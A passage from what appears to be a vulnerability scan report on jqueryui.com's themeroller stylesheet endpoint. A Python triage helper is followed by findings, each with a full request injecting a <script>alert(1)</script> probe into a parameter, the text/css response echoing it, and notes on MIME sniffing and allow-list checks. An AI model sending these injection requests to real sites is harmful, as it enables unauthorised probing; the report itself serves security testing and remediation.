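        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def reflection_context(body, index):
    """Classify offset `index` in a CSS body: inside a comment or in rule text.

    We are inside a comment when the last '/*' before the offset has not been
    closed by a later '*/'.
    """
    before = body[:index]
    return "css-comment" if before.rfind("/*") > before.rfind("*/") else "css-rule"


def triage(raw, canary):
    """Collect the facts that decide how a reflected-input finding is rated."""
    status, headers, body = split_response(raw)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    nosniff = headers.get("x-content-type-options", "").strip().lower() == "nosniff"
    idx = body.find(canary)
    result = {
        "status": status,
        "content_type": ctype,
        "nosniff": nosniff,
        "reflected_verbatim": idx >= 0,
        "reflected_encoded": html.escape(canary, quote=False) in body,
        "context": None,
        # A <script> tag only runs when the document is parsed as HTML. With
        # any other declared type it needs the browser to sniff the body as
        # HTML, which is what nosniff forbids; that case is sniff_risk().
        "script_executes_as_served": False,
    }
    if idx >= 0:
        if ctype == "text/css":
            result["context"] = reflection_context(body, idx)
        elif ctype == "text/html":
            result["context"] = "html"
        else:
            result["context"] = "other"
        result["script_executes_as_served"] = ctype == "text/html"
    return result


def sniff_risk(result):
    """Verbatim reflection into a non-HTML type with no nosniff header."""
    return (result["reflected_verbatim"]
            and not result["nosniff"]
            and result["content_type"] != "text/html")


if __name__ == "__main__":
    for key, value in triage(SAMPLE_RESPONSE, CANARY).items():
        print("%-26s %s" % (key, value))
```

Paste the headers and body of any other response in this section into SAMPLE_RESPONSE to re-run the check; the output separates "echoed verbatim into a text/css comment with no nosniff header" from a genuine HTML-context reflection, which is the difference between a CSS-injection and MIME-sniffing issue and a straightforward reflected XSS.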

1.215. http://jqueryui.com/themeroller/css/parseTheme.css.php [ctl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the ctl request parameter is copied into the response body without any encoding. The payload 1442f<script>alert(1)</script>ef11e82e504 was submitted in the ctl parameter and echoed unmodified. The response is served as text/css; because no theme parameters were supplied, the stylesheet falls back to its defaults and the only sink in this response is the /* ... */ comment at the top, where the script repeats the full query string after "To view and modify this theme, visit". The only value of ctl seen in this scan is the fixed keyword themeroller, so a strict comparison against the known keyword would have rejected the payload outright.

Whether the injected <script> tag ever executes depends on a browser ignoring the declared text/css type and rendering the body as HTML; the response sets no X-Content-Type-Options: nosniff header, which is the header that forbids that sniffing. Independently of script execution, unencoded reflection into a stylesheet is a CSS injection sink: if the comment terminator */ is reflected as well (not tested by this scan), an attacker controls rules in a stylesheet that the themeroller page loads.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller1442f<script>alert(1)</script>ef11e82e504 HTTP/1.1
Accept: */*
Referer: http://jqueryui.com/themeroller/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.2.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:11:21 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 16599


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller1442f<script>alert(1)</script>ef11e82e504
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .ui-
...[SNIP]...

1.216. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcActive request parameter is copied into the response body without any encoding. The payload 46429<script>alert(1)</script>0418f0c6ca5 was submitted in the fcActive parameter and echoed unmodified. The response is served as text/css, and the reflection lands inside the /* ... */ comment at the top of the generated stylesheet, where the script repeats the full query string after "To view and modify this theme, visit". Every fc* (font colour) value seen in these requests is a six-digit hex colour, so an allow-list check such as ^[0-9a-fA-F]{6}$ would have rejected the payload outright.

Whether the injected <script> tag ever executes depends on a browser ignoring the declared text/css type and rendering the body as HTML; the response sets no X-Content-Type-Options: nosniff header, which is the header that forbids that sniffing. Independently of script execution, unencoded reflection into a stylesheet is a CSS injection sink: if the comment terminator */ is reflected as well (not tested by this scan), an attacker controls rules in a stylesheet that the themeroller page loads.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff46429<script>alert(1)</script>0418f0c6ca5&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:53 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
g&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff46429<script>alert(1)</script>0418f0c6ca5&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=f
...[SNIP]...

1.217. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcContent request parameter is copied into the response body without any encoding. The payload 79b56<script>alert(1)</script>cdf5961ed62 was submitted in the fcContent parameter and echoed unmodified. The response is served as text/css, and the reflection lands inside the /* ... */ comment at the top of the generated stylesheet, where the script repeats the full query string after "To view and modify this theme, visit". Every fc* (font colour) value seen in these requests is a six-digit hex colour, so an allow-list check such as ^[0-9a-fA-F]{6}$ would have rejected the payload outright.

Whether the injected <script> tag ever executes depends on a browser ignoring the declared text/css type and rendering the body as HTML; the response sets no X-Content-Type-Options: nosniff header, which is the header that forbids that sniffing. Independently of script execution, unencoded reflection into a stylesheet is a CSS injection sink: if the comment terminator */ is reflected as well (not tested by this scan), an attacker controls rules in a stylesheet that the themeroller page loads.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee79b56<script>alert(1)</script>cdf5961ed62&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
acityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee79b56<script>alert(1)</script>cdf5961ed62&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTex
...[SNIP]...

1.218. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcDefault request parameter is copied into the response body without any encoding. The payload 652a9<script>alert(1)</script>a5ffbabd6c0 was submitted in the fcDefault parameter and echoed unmodified. The response is served as text/css, and the reflection lands inside the /* ... */ comment at the top of the generated stylesheet, where the script repeats the full query string after "To view and modify this theme, visit". Every fc* (font colour) value seen in these requests is a six-digit hex colour, so an allow-list check such as ^[0-9a-fA-F]{6}$ would have rejected the payload outright.

Whether the injected <script> tag ever executes depends on a browser ignoring the declared text/css type and rendering the body as HTML; the response sets no X-Content-Type-Options: nosniff header, which is the header that forbids that sniffing. Independently of script execution, unencoded reflection into a stylesheet is a CSS injection sink: if the comment terminator */ is reflected as well (not tested by this scan), an attacker controls rules in a stylesheet that the themeroller page loads.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333652a9<script>alert(1)</script>a5ffbabd6c0&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:34 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
tent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333652a9<script>alert(1)</script>a5ffbabd6c0&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=
...[SNIP]...

1.219. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcError request parameter is copied into the response body without any encoding. The payload 3b3b2<script>alert(1)</script>3834a03bc29 was submitted in the fcError parameter and echoed unmodified. The response is served as text/css, and the reflection lands inside the /* ... */ comment at the top of the generated stylesheet, where the script repeats the full query string after "To view and modify this theme, visit"; the response below shows the comment being closed by */ immediately after the echoed query string. Every fc* (font colour) value seen in these requests is a six-digit hex colour, so an allow-list check such as ^[0-9a-fA-F]{6}$ would have rejected the payload outright.

Whether the injected <script> tag ever executes depends on a browser ignoring the declared text/css type and rendering the body as HTML; the response sets no X-Content-Type-Options: nosniff header, which is the header that forbids that sniffing. Independently of script execution, unencoded reflection into a stylesheet is a CSS injection sink: if the comment terminator */ is reflected as well (not tested by this scan), an attacker controls rules in a stylesheet that the themeroller page loads.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a3b3b2<script>alert(1)</script>3834a03bc29&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:20 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17886


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a3b3b2<script>alert(1)</script>3834a03bc29&iconColorError=cd0a0a
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Helvetica, Arial, sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select,
...[SNIP]...

1.220. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcHeader request parameter is copied into the response body without any encoding. The payload 89669<script>alert(1)</script>12337c89220 was submitted in the fcHeader parameter and echoed unmodified. The response is served as text/css, and the reflection lands inside the /* ... */ comment at the top of the generated stylesheet, where the script repeats the full query string after "To view and modify this theme, visit". Every fc* (font colour) value seen in these requests is a six-digit hex colour, so an allow-list check such as ^[0-9a-fA-F]{6}$ would have rejected the payload outright.

Whether the injected <script> tag ever executes depends on a browser ignoring the declared text/css type and rendering the body as HTML; the response sets no X-Content-Type-Options: nosniff header, which is the header that forbids that sniffing. Independently of script execution, unencoded reflection into a stylesheet is a CSS injection sink: if the comment terminator */ is reflected as well (not tested by this scan), an attacker controls rules in a stylesheet that the themeroller page loads.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff89669<script>alert(1)</script>12337c89220&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:26 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
efault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff89669<script>alert(1)</script>12337c89220&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextur
...[SNIP]...

1.221. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcHighlight request parameter is copied into the response body without any encoding. The payload 12d09<script>alert(1)</script>bd625786f90 was submitted in the fcHighlight parameter and echoed unmodified. The response is served as text/css, and the reflection lands inside the /* ... */ comment at the top of the generated stylesheet, where the script repeats the full query string after "To view and modify this theme, visit". Every fc* (font colour) value seen in these requests is a six-digit hex colour, so an allow-list check such as ^[0-9a-fA-F]{6}$ would have rejected the payload outright.

Whether the injected <script> tag ever executes depends on a browser ignoring the declared text/css type and rendering the body as HTML; the response sets no X-Content-Type-Options: nosniff header, which is the header that forbids that sniffing. Independently of script execution, unencoded reflection into a stylesheet is a CSS injection sink: if the comment terminator */ is reflected as well (not tested by this scan), an attacker controls rules in a stylesheet that the themeroller page loads.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc12d09<script>alert(1)</script>bd625786f90&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:06 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc12d09<script>alert(1)</script>bd625786f90&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a
*/


/* Component containers
---------------
...[SNIP]...

1.222. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcHover request parameter is copied into the response body without any encoding. The payload 226d6<script>alert(1)</script>a788d32d033 was submitted in the fcHover parameter and echoed unmodified. The response is served as text/css, and the reflection lands inside the /* ... */ comment at the top of the generated stylesheet, where the script repeats the full query string after "To view and modify this theme, visit". Every fc* (font colour) value seen in these requests is a six-digit hex colour, so an allow-list check such as ^[0-9a-fA-F]{6}$ would have rejected the payload outright.

Whether the injected <script> tag ever executes depends on a browser ignoring the declared text/css type and rendering the body as HTML; the response sets no X-Content-Type-Options: nosniff header, which is the header that forbids that sniffing. Independently of script execution, unencoded reflection into a stylesheet is a CSS injection sink: if the comment terminator */ is reflected as well (not tested by this scan), an attacker controls rules in a stylesheet that the themeroller page loads.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000226d6<script>alert(1)</script>a788d32d033&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:46 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
OpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000226d6<script>alert(1)</script>a788d32d033&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHigh
...[SNIP]...

1.223. http://jqueryui.com/themeroller/css/parseTheme.css.php [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

